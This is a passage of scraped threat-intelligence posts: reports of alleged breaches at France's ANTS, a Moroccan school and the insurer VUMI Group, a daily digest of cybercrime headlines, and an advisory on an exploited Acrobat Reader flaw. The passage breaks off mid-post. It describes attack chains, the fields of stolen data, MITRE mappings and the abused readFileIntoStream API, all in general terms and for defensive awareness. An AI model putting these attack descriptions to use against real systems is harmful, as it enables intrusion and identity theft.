DF community powered by darknet\[.\]im.](https://x.com/DarkWebInformer/status/2044130379158696331?s=20) 💡 [Has anyone confirmed this?](https://x.com/DarkWebInformer/status/2044133360855846922?s=20) ❗️ [.@telegram continues to host a sanctioned crypto laundering marketplace worth billions despite UK sanctions and repeated bans, Xinbi Guarantee keeps resurfacing on the messaging platform, raising hard questions about Telegram's willingness to police its own ecosystem.](https://x.com/DarkWebInformer/status/2044139176711598414?s=20) ❗️ [Threat actor ekko2k is actively purchasing Brazilian digital assets and infrastructure access including shells, cPanel accounts, and employee credentials, with particular interest in e-commerce and payment systems on a popular Russian forum.](https://x.com/DarkWebInformer/status/2044140327041126883?s=20) ❗️ [CVE-2025-2563: The User Registration & Membership WordPress plugin before 4.1.2 does not prevent users to set their account role when the Membership Addon is enabled, leading to a privilege escalation issue and allowing unauthenticated users to gain admin privileges](https://x.com/DarkWebInformer/status/2044157987959287981?s=20) ❗️ [The customer and orders database of SpecProm, a Ukrainian military equipment shop, is allegedly being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044164087928762388?s=20) 💡 [Fortinet vulns scanner...](https://x.com/DarkWebInformer/status/2044164677442122183?s=20) 💡 [I updated with some bug fixes and improved the alert notifications with more options. Assuming that goes well this new News feed will go out to all paid subscribers Thursday.](https://x.com/DarkWebInformer/status/2044169804601327816?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### France's National ID Agency ANTS Allegedly Breached, 18 Million Citizen Records With Government-Verified Identities Listed for Sale URL: https://darkwebinformer.com/frances-national-id-agency-ants-allegedly-breached-18-million-citizen-records-with-government-verified-identities-listed-for-sale/ Last updated: 2026-04-14T16:21:33.000Z Dark Web Informer - Cyber Threat Intelligence # France's National ID Agency ANTS Allegedly Breached, 18 Million Citizen Records With Government-Verified Identities Listed for Sale April 14, 2026 - 5:26:51 PM UTC France Government / National Security Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-14 17:26:51 UTC Threat Actors EvilDump, ExtaseHunters, Breach3d Victim ANTS (France Titres) Industry Government / National Security Category Data Breach Total Records 18,000,000 Agency Function Secure ID & Legal Titles Severity Critical Price DM for Offers Escrow Middleman Accepted Network Open Web Country France ## Incident Overview A group of threat actors (EvilDump, ExtaseHunters, and Breach3d) claims to have compromised ANTS (Agence Nationale des Titres Securises), the French government agency responsible for issuing and managing secure identification documents and legal titles. ANTS, now operating under the France Titres brand, handles the production and delivery of passports, national identity cards, driver's licenses, vehicle registration certificates, and other official government documents for French citizens. The actors are listing a database of 18 million records for sale. The sample JSON data confirms the database structure with highly detailed per-record fields: - **Full Legal Names**: First names, up to 5 middle/additional names (prenom1 through prenom5), last names, and usage/maiden names (nomusage). The sample shows records with multiple given names reflecting French naming conventions. - **Contact Details**: Personal email addresses from providers including Orange, Gmail, Hotmail, and custom domains, alongside verified mobile phone numbers. - **Detailed Birth Data**: Exact dates of birth, birth city (naisscommune), birth department (naissdepartement), and birth country (naisspays). - **Physical Addresses**: Street number, street name, postal code, city, commune, and country fields. Many records in the sample show empty address fields, suggesting partial population. - **Account Metadata**: Unique usernames (identifiant, which are internal system IDs), government certification status (certifie: true/false indicating whether the identity has been government-verified), and professional status flags (pro: true/false). - **Gender and Civil Status**: Civil titles (M./Mme) and professional status indicators. The government-verified certification status field is what makes this breach exceptionally dangerous. The "certifie: true" flag means the French government itself has confirmed that identity is authentic. For an attacker, a government-certified identity record is the gold standard for identity fraud because it carries implicit trust across all French administrative, financial, and legal systems. The 18 million record count represents a significant portion of the French adult population (France has approximately 50 million adults), making this one of the largest alleged government identity breaches in European history if confirmed. The post was made by EvilDump and credits ExtaseHunters and Breach3d as collaborators. The sample data shows sequential internal IDs (79000072 through 79000080) suggesting structured database extraction rather than scraping. ## Compromised Data Categories Full Legal Names (Up to 5 Names) Usage / Maiden Names Email Addresses Verified Mobile Numbers Dates of Birth Birth City & Department Physical Addresses Government Certification Status System Identifiers Gender & Civil Titles Professional Status Flags ## Image Preview [![Forum post by EvilDump announcing ANTS breach with France Titres logo, 18 million record count, data field descriptions, and credits to ExtaseHunters and Breach3d](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872569872659872657829872.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872569872659872657829872.png) [![Sample JSON data showing French citizen records with identifiants, full names, email addresses, certification status, birth dates, addresses, and sequential internal system IDs](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872569872659872657829873.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872569872659872657829873.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets the French national identity agency's infrastructure to gain access to the citizen identity verification database containing 18 million government-certified records. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts 18 million structured citizen identity records from the ANTS database, including names, birth data, addresses, contact details, and government certification status. ](https://attack.mitre.org/techniques/T1213/) [ T1589.001 Gather Victim Identity: Credentials Harvests government-verified citizen identity records representing a significant portion of the French adult population, with certification flags confirming official identity validation. ](https://attack.mitre.org/techniques/T1589/001/) [ T1078 Valid Accounts System identifiers (identifiant usernames) and government certification status could be leveraged to impersonate citizens or access connected French government services. ](https://attack.mitre.org/techniques/T1078/) [ T1657 Financial Theft Government-certified identity records are the highest-value identity fraud asset, enabling bank account fraud, credit applications, tax fraud, and administrative impersonation across all French systems. ](https://attack.mitre.org/techniques/T1657/) [ T1567 Exfiltration Over Web Service Advertises the stolen national identity database on public forums with DM-based pricing and middleman/escrow accepted for transactions. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Moroccan Biomedical School SUPTECH SANTE Breached, 231 Student Dossiers With National IDs, Diplomas, and ID Card Photos Exposed URL: https://darkwebinformer.com/moroccan-biomedical-school-suptech-sante-breached-231-student-dossiers-with-national-ids-diplomas-and-id-card-photos-exposed/ Last updated: 2026-04-14T15:56:05.000Z Dark Web Informer - Cyber Threat Intelligence # Moroccan Biomedical School SUPTECH SANTE Breached, 231 Student Dossiers With National IDs, Diplomas, and ID Card Photos Exposed April 14, 2026 - 5:04:38 PM UTC Morocco Education / Healthcare Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-14 17:04:38 UTC Threat Actor xNov Victim SUPTECH SANTE (suptech-sante.ma) Industry Education / Healthcare Category Data Breach Exposed Dossiers 231 Additional for Sale 500+ Dossiers Data Range 2025/2026 Related Campaign OFPPT Breach Continuation Price Partial Free / Full for Sale Campuses Mohammedia & Essaouira Country Morocco ## Incident Overview Threat actor xNov has leaked the database of SUPTECH SANTE, formally named Ecole Superieure de Genie Biomedical et des Techniques de Sante, a Moroccan higher education institution specializing in Biomedical Engineering and Health Technologies. Founded in 2023 by FRDISI (Fondation de Recherche, de Developpement et d'Innovation en Sciences et Ingenierie), the school operates campuses in Mohammedia and Essaouira and hosts Jobintech, a government-backed free digital training program. The actor explicitly states this breach is a continuation of the OFPPT breach campaign, indicating a sustained effort targeting Moroccan educational institutions. This is also the same actor behind the Smarteez / L'Oreal Morocco breach from earlier this month. The exposed data includes 231 student dossiers from the 2025/2026 academic period, with each dossier containing: - **Identity Documents**: Full names, national ID numbers (CIN, Morocco's Carte d'Identite Nationale), and national ID card photos. This combination of ID number plus photo constitutes a complete identity verification package. - **Academic Documents**: Diploma and degree certificate scans, enrolled training program and specialization details, and Massar codes (Morocco's national student tracking system identifier used across all educational institutions). - **Contact Information**: Phone numbers, email addresses, and personal numbers. - **Personal Data**: Dates of birth, gender, and inscription receipt codes. The 231 dossiers are offered as a partial leak with an additional 500+ dossiers available for purchase with escrow accepted. Since SUPTECH SANTE focuses on biomedical engineering and health technology, these students are likely pursuing careers in medical device engineering, clinical technology, and health informatics. The exposure of their national ID photos alongside Massar codes and diploma scans creates both an identity theft risk and a potential for fraudulent credential claims in the healthcare sector. ## Compromised Data Categories Full Names National ID Numbers (CIN) National ID Card Photos Diploma / Degree Certificate Scans Phone Numbers Email Addresses Dates of Birth Gender Massar Codes Inscription Receipts Training Program & Specialization ## Image Preview [![Forum post by xNov leaking SUPTECH SANTE database with school logo, description of Moroccan biomedical institution, and OFPPT breach continuation statement](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/79823598762398762359872398752938752.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/79823598762398762359872398752938752.png) [![Data fields listing for 231 student dossiers including CIN, ID card photos, diploma scans, Massar codes, and 500+ additional dossiers for sale with Session and Telegram contact](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/79823598762398762359872398752938753.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/79823598762398762359872398752938753.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the educational institution's web platform as part of a broader campaign against Moroccan education infrastructure following the OFPPT breach. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured student enrollment dossiers from the institution's database including personal data, academic records, Massar codes, and enrollment details. ](https://attack.mitre.org/techniques/T1213/) [ T1005 Data from Local System Collects scanned documents stored on the institution's systems including national ID card photos, diploma scans, and degree certificate images for each student dossier. ](https://attack.mitre.org/techniques/T1005/) [ T1567 Exfiltration Over Web Service Distributes the stolen student dossiers as a partial free download with 500+ additional records available for purchase, using the same password-protected distribution method as previous breaches. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - April 13th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-april-13th-2026/ Last updated: 2026-04-13T22:41:57.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Threat Actor Selling 70GB of ITAR-Controlled SEKISUI Aerospace Technical Data Including Boeing 737/787 Tooling, STEP Files, and Military Program Schematics for $200,000](#) FREE ❗️ [Polish Eco-Friendly Retailer VegeHome Suffers Data Breach Exposing 100K+ Customers](#) FREE ❗️ [International Insurer VUMI Group Allegedly Breached, 300K Policyholders and 25K Staff Exposed With SSNs, Passports, and W-9 Forms](#) FREE ❗️ [CVE-2026-34621: Adobe Acrobat Reader Prototype Pollution Zero-Day Enables Code Execution via Malicious PDFs](#) FREE X/Twitter Updates ❗️ [A solo hacker leveraged ChatGPT and Claude to infiltrate nine Mexican government agencies running from late December 2025 through mid-February 2026 walking away with hundreds of millions of citizen records in what amounted to one of the most technically advanced campaigns.](https://x.com/DarkWebInformer/status/2043509137741353015?s=20) ❗️ [New Ransomware Group Identified: LAMASHTU](https://x.com/DarkWebInformer/status/2043700083871338725?s=20) ❗️ [A threat actor leaked a database containing personnel information of Iranian Revolutionary Guard Corps (IRGC) and Basij members, including full names, national ID codes, addresses, ranks, and phone numbers.](https://x.com/DarkWebInformer/status/2043702342776717447?s=20) ❗️ [Threat Actor Selling 70GB of ITAR-Controlled SEKISUI Aerospace Technical Data Including Boeing 737/787 Tooling, STEP Files, and Military Program Schematics for $200,000](https://x.com/DarkWebInformer/status/2043705580137677251?s=20) ❗️ [The full CRM PII dataset of Mihnati.com, a Saudi Arabian job recruitment platform, has allegedly been breached and is being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2043710078646157431?s=20) ❗️ [Threat actor Z3r00 claims to have leaked a credential list containing 18,530 records from Mexican pharmacy chain Farmacias del Ahorro, including email addresses and passwords.](https://x.com/DarkWebInformer/status/2043713252274659813?s=20) ❗️ [ShinyHunters has priced the Rockstar Games breach at $200K.](https://x.com/DarkWebInformer/status/2043717164339777917?s=20) 💡 [The API was updated with the new sources, there is now 5,000+ articles. Do a fresh pull of the news endpoint to get the latest...](https://x.com/DarkWebInformer/status/2043720947438411941?s=20) ❗️ [A threat actor is selling two zero-day exploits: a Windows RDP denial-of-service exploit for $850 affecting 1M+ devices, and a FreeBSD FTP remote code execution exploit for $900 affecting 11,689 devices.](https://x.com/DarkWebInformer/status/2043724450290352295?s=20) ❗️ [The owners and rentals database of Emaar Properties, one of the largest real estate developers in Dubai/UAE, is allegedly being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2043726689147187223?s=20) 💡 [Just another day on X.](https://x.com/DarkWebInformer/status/2043727847215305154?s=20) ❗️ [Kraken is currently being extorted by a criminal group threatening to release videos of it's internal systems.](https://x.com/DarkWebInformer/status/2043733747246268655?s=20) ❗️ [Threat actor claims to be selling a dataset containing 563,000 user records from Talabat Saudi Arabia, including personal information such as names, emails, phone numbers, addresses, and account details.](https://x.com/DarkWebInformer/status/2043736014414369054?s=20) ❗️ [A group is advertising domain ban, hold, de-delegation, DMCA, and phishing abuse services on a popular cybercrime forum, claiming to process 15,000+ abuses per day.](https://x.com/DarkWebInformer/status/2043741147785298277?s=20) ❗️ [JINKUSU is teasing a new AI called EMPIRE GPT, that lets you do whatever you want, for free. Not yet available.](https://x.com/DarkWebInformer/status/2043746722506068446?s=20) ❗️ [ShadowByt3$ RaaS has made a Partnership Program post on a popular Russian cybercrime forum](https://x.com/DarkWebInformer/status/2043749972089114916?s=20) ❗️ [HYFLOCK RaaS/Panel seen on a popular Russian cybercrime forum](https://x.com/DarkWebInformer/status/2043753668478931178?s=20) ❗️ [The forum "T1erOne" has launched its first article-writing contest, posted by an Admin on April 13, 2026.](https://x.com/DarkWebInformer/status/2043758159475490942?s=20) ❗️ [An advanced phishing suite targeting Twilio SendGrid is being advertised on a popular cybercrime forum, designed for credential theft and 2FA interception.](https://x.com/DarkWebInformer/status/2043767388580036906?s=20) ❗️ [The complete source code and full database of vidaecor.com.br, an established Brazilian home linen (enxoval) e-commerce store, is allegedly being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2043771275072483661?s=20) 💡 [Ut oh](https://x.com/DarkWebInformer/status/2043785028786643063?s=20) ❗️ [ShinyHunters has leaked the Rockstar Games data.](https://x.com/DarkWebInformer/status/2043777264400167179?s=20) ❗️ [Threat actor australia shared 1,000 Minecraft-related database dumps for free download.](https://x.com/DarkWebInformer/status/2043802488394887465?s=20) ❗️ [The users database of 247falcon.ro, a Romanian company, has allegedly been breached and is being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2043808760116728223?s=20) ❗️ [Alternativa de Moda SAS has been claimed a victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2043811436523086121?s=20) ❗️ [Colorado Pulmonary Intensivists, a US healthcare provider affiliated with UCHealth, has allegedly been listed on the PEAR (Pure Extraction And Ransom) ransomware group's leak site.](https://x.com/DarkWebInformer/status/2043813166384124008?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### CVE-2026-34621: Adobe Acrobat Reader Prototype Pollution Zero-Day Enables Code Execution via Malicious PDFs URL: https://darkwebinformer.com/cve-2026-34621-adobe-acrobat-reader-prototype-pollution-zero-day-enables-code-execution-via-malicious-pdfs/ Last updated: 2026-04-13T20:08:00.000Z Zero-Day · Actively Exploited Since November 2025 # CVE-2026-34621: Adobe Acrobat Reader Prototype Pollution Zero-Day Enables Code Execution via Malicious PDFs Adobe ships an emergency patch for a critical prototype pollution flaw in Acrobat Reader that has been exploited in the wild since late 2025, discovered through the EXPMON sandbox detection platform. Dark Web Informer April 13, 2026 6 min read CVECVE-2026-34621 ProductAdobe Acrobat Reader (Windows, macOS) Bug ClassPrototype Pollution, [CWE-1321](https://cwe.mitre.org/data/definitions/1321.html) CVSS 3.18.6 / High (revised from 9.6) VectorAV:L / AC:L / PR:N / UI:R / S:C / C:H / I:H / A:H ExploitationConfirmed in the wild since Nov 2025 ImpactArbitrary code execution via malicious PDF BulletinAPSB26-43 (Priority 1) ReporterHaifei Li (EXPMON) NVD Entry[nvd.nist.gov/vuln/detail/CVE-2026-34621](https://nvd.nist.gov/vuln/detail/CVE-2026-34621) Adobe has released an emergency security update for Acrobat Reader, patching **CVE-2026-34621**, a critical prototype pollution vulnerability that has been [actively exploited in the wild since at least November 2025](https://securityaffairs.com/190697/security/adobe-fixes-actively-exploited-acrobat-reader-flaw-cve-2026-34621.html). The flaw enables arbitrary code execution when a user opens a specially crafted PDF file. Adobe published the fix under bulletin APSB26-43 on April 11, 2026, with Priority 1, its highest urgency rating. The vulnerability was discovered by security researcher **Haifei Li** through [EXPMON](https://www.helpnetsecurity.com/2026/04/13/adobe-acrobat-reader-cve-2026-34621-emergency-fix/), a publicly available sandbox-based platform designed to detect advanced file-based exploits. A suspicious PDF submitted to the platform on March 26 was flagged by its automated detection engine despite having low antivirus detection rates on VirusTotal (13 out of 64 engines). ## How prototype pollution works in Acrobat Prototype pollution is a JavaScript vulnerability class where an attacker can add or modify properties on the base **Object.prototype**. Because nearly all JavaScript objects inherit from this prototype, injected properties propagate throughout the application. When legitimate code later accesses a property that does not exist on a specific object, JavaScript's prototype chain lookup hits the attacker-controlled value instead. In the context of Adobe Acrobat Reader, the exploit works by embedding malicious JavaScript inside a crafted PDF. When a victim opens the file, the prototype pollution flaw allows the attacker to manipulate internal object structures within the Acrobat JavaScript engine. This can escalate to calling privileged Acrobat APIs that are normally restricted. According to the analysis by EXPMON, the observed exploit used the **util.readFileIntoStream()** API to read arbitrary files from the local system that the Reader process (running in a sandbox) could access. The malicious PDFs were designed to fingerprint the target system and exfiltrate information back to the attacker, suggesting this was part of a targeted reconnaissance campaign rather than a broad spray-and-pray operation. **Five months of exploitation before detection.** The exploit has been active in the wild since at least November 2025, but was not identified until March 26, 2026 when a sample was submitted to EXPMON. The long dwell time highlights the gap between traditional antivirus detection and sandbox-based exploit analysis. At the time of discovery, only 13 of 64 VirusTotal engines flagged the malicious PDF. ## Discovery timeline Nov 2025 Earliest known in-the-wild exploitation of CVE-2026-34621 begins. Mar 26 Suspicious PDF submitted to EXPMON. Flagged by advanced detection despite low AV coverage (13/64 on VirusTotal). Apr 11 Adobe publishes emergency bulletin APSB26-43, confirms active exploitation, and releases patched versions. Apr 12 CVSS score revised from 9.6 (network vector) to 8.6 (local vector, requires user interaction). Apr 13 Adobe credits Haifei Li of EXPMON for discovery and coordinated disclosure. ## Affected versions and patches The vulnerability affects multiple Acrobat and Reader product lines across both Windows and macOS. Adobe has released patched versions under bulletin APSB26-43: Product Fixed Version Acrobat DC / Acrobat Reader DC (Win/Mac) 26.001.21411 Acrobat 2024 (Windows) 24.001.30362 Acrobat 2024 (macOS) 24.001.30360 Versions **26.001.21367** and **24.001.30356** and earlier are confirmed vulnerable. ## What to do **Update Acrobat Reader immediately.** Open Acrobat Reader, go to Help, then Check for Updates. Adobe has assigned this patch Priority 1, meaning it should be installed within 72 hours. **Warn users about untrusted PDFs.** Because exploitation requires opening a malicious file, instruct users not to open PDF attachments from unknown or suspicious sources. This is especially relevant for organizations targeted by spear-phishing. **Disable JavaScript in PDFs where possible.** Acrobat Reader allows administrators to disable JavaScript execution in PDFs via preferences or group policy. This removes the primary attack surface for this vulnerability class. **Block the known indicator.** Security teams should monitor and block all HTTP/HTTPS traffic containing "Adobe Synchronizer" in the User Agent field, which was associated with the observed exploitation activity. **Hunt for historical compromise.** Given the exploitation window stretches back to November 2025, organizations should review endpoint telemetry for suspicious PDF-related activity over the past five months, particularly unexpected calls to util.readFileIntoStream() or unusual outbound connections from Acrobat processes. ## Bigger picture Prototype pollution has traditionally been seen as a web application vulnerability, most commonly exploited in Node.js and browser JavaScript contexts. Its appearance in a desktop PDF reader demonstrates that the attack class extends to any application with a sufficiently complex JavaScript engine. Acrobat Reader's embedded JavaScript runtime, used for forms, annotations, and document automation, provides enough surface area for attackers to chain prototype pollution into full code execution. The five-month gap between the start of exploitation and discovery is a stark reminder of the limitations of signature-based detection. The malicious PDFs evaded the majority of antivirus engines and were only caught by a purpose-built sandbox platform. Organizations that rely solely on traditional endpoint protection may have been exposed for the entire window without knowing it. Adobe Acrobat Reader remains one of the most widely deployed desktop applications in the world, installed on hundreds of millions of systems across enterprise and consumer environments. Any code execution vulnerability that can be triggered by simply opening a PDF makes it a high-value target for both nation-state actors running espionage campaigns and financially motivated attackers delivering malware through phishing. Sources: [Help Net Security](https://www.helpnetsecurity.com/2026/04/13/adobe-acrobat-reader-cve-2026-34621-emergency-fix/) · [Security Affairs](https://securityaffairs.com/190697/security/adobe-fixes-actively-exploited-acrobat-reader-flaw-cve-2026-34621.html) · [The Cyber Express](https://thecyberexpress.com/acrobat-reader-flaw-adobe-cve-2026-34621/) · [Vulert](https://vulert.com/blog/adobe-acrobat-reader-cve-2026-34621/) · [Born City](https://borncity.com/win/2026/04/12/adobe-reader-emergency-patch-for-0-day-vulnerability-cve-2026-34621/) · [NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-34621) ### International Insurer VUMI Group Allegedly Breached, 300K Policyholders and 25K Staff Exposed With SSNs, Passports, and W-9 Forms URL: https://darkwebinformer.com/international-insurer-vumi-group-allegedly-breached-300k-policyholders-and-25k-staff-exposed-with-ssns-passports-and-w-9-forms/ Last updated: 2026-04-13T17:35:20.000Z Dark Web Informer - Cyber Threat Intelligence # International Insurer VUMI Group Allegedly Breached, 300K Policyholders and 25K Staff Exposed With SSNs, Passports, and W-9 Forms April 13, 2026 - 2:12:51 PM UTC United States Insurance Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-13 14:12:51 UTC Threat Actor bytetobreach Victim VUMI Group International Insurance Industry Insurance Category Data Breach Insured Clients \~300,000 Staff / Partners / Agents 25,000+ Exfiltration Duration 6 Days Severity Critical Price Contact Seller Network Open Web Country United States ## Incident Overview A threat actor going by bytetobreach claims to have breached VUMI Group, an international health and life insurance provider. VUMI Group operates globally and provides coverage to expatriates, multinational organizations, and high-net-worth individuals. The actor states the exfiltration took 6 days using carefully calibrated parameters to avoid crashing the server, and emphasizes that all databases and documents were taken exclusively from VUMI Group with no third-party involvement. The breach reportedly exposes approximately 300,000 insured clients and over 25,000 staff, partners, and agents. The actor describes the dataset as containing "everything" and specifically highlights the following: - **Complete PII**: Full personally identifiable information for both agents and clients. - **Social Security Numbers**: SSNs for affected individuals, confirmed by a dedicated proof screenshot (5\_SSN\_NUMBERS.png). - **Passport Documents**: Scanned passport documents for policyholders, confirmed by a separate proof screenshot (6\_PASSPORT.png). - **W-9 Tax Forms**: U.S. tax forms containing taxpayer identification numbers, legal names, addresses, and certification signatures. The actor provided a methodical series of proof screenshots documenting the attack chain: 1\_POSSIBLE\_VULNERABILITY.png (initial vulnerability discovery), 2\_PAYLOAD.png (exploit delivery), 3\_DB\_ENUM.png (database enumeration), 4\_EXFILTRATION.png (data extraction), 5\_SSN\_NUMBERS.png (SSN data proof), and 6\_PASSPORT.png (passport document proof). This structured proof format suggests a deliberate, documented attack rather than an opportunistic data grab. The data is being distributed through OwnCloud with two backup links, and the actor prefers contact via Session or Signal messaging. Given that VUMI Group serves expatriates and international clients, the combination of SSNs, passport scans, and W-9 forms creates an exceptionally high identity theft risk. Passport documents in particular enable travel document fraud, while W-9 forms provide the exact information needed for tax identity theft. ## Compromised Data Categories Social Security Numbers Passport Documents (Scans) W-9 Tax Forms Complete PII (Clients & Agents) Insurance Policy Data Staff & Partner Records Agent Network Data Database Contents ## Image Preview [![Forum post by bytetobreach showing VUMI Group International Insurance logo and initial vulnerability proof screenshot](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9237895692783659872365987236598722.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9237895692783659872365987236598722.png) [![Attack chain proof screenshots, 300K insured and 25K staff exposure details, OwnCloud download links, and Session/Signal contact preferences](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9237895692783659872365987236598723.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9237895692783659872365987236598723.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application The documented attack chain shows vulnerability discovery followed by payload delivery against VUMI Group's web-facing infrastructure to gain initial access to the insurance database. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Database enumeration followed by systematic extraction of policyholder records, agent data, SSNs, passport documents, and W-9 forms from VUMI Group's insurance management systems. ](https://attack.mitre.org/techniques/T1213/) [ T1589.001 Gather Victim Identity: Credentials Harvests SSNs, passport data, and W-9 tax forms for 300,000 insured clients and 25,000+ staff/agents, creating a comprehensive identity theft and tax fraud dataset. ](https://attack.mitre.org/techniques/T1589/001/) [ T1030 Data Transfer Size Limits The actor explicitly used throttled extraction parameters over 6 days to avoid crashing the server, indicating careful data transfer size management during the exfiltration. ](https://attack.mitre.org/techniques/T1030/) [ T1567 Exfiltration Over Web Service Distributes the stolen insurance data through OwnCloud with two backup download links, with the actor preferring Session and Signal for buyer communications. ](https://attack.mitre.org/techniques/T1567/) [ T1005 Data from Local System Collects scanned passport documents and W-9 tax forms stored on the insurance company's file systems, representing document-level data beyond structured database records. ](https://attack.mitre.org/techniques/T1005/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Polish Eco-Friendly Retailer VegeHome Suffers Data Breach Exposing 100K+ Customers URL: https://darkwebinformer.com/polish-eco-friendly-retailer-vegehome-suffers-data-breach-exposing-100k-customers/ Last updated: 2026-04-13T15:54:27.000Z Dark Web Informer - Cyber Threat Intelligence # Polish Eco-Friendly Retailer VegeHome Suffers Data Breach Exposing 100K+ Customers April 13, 2026 - 8:11:37 AM UTC Poland E-Commerce / Retail Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-13 08:11:37 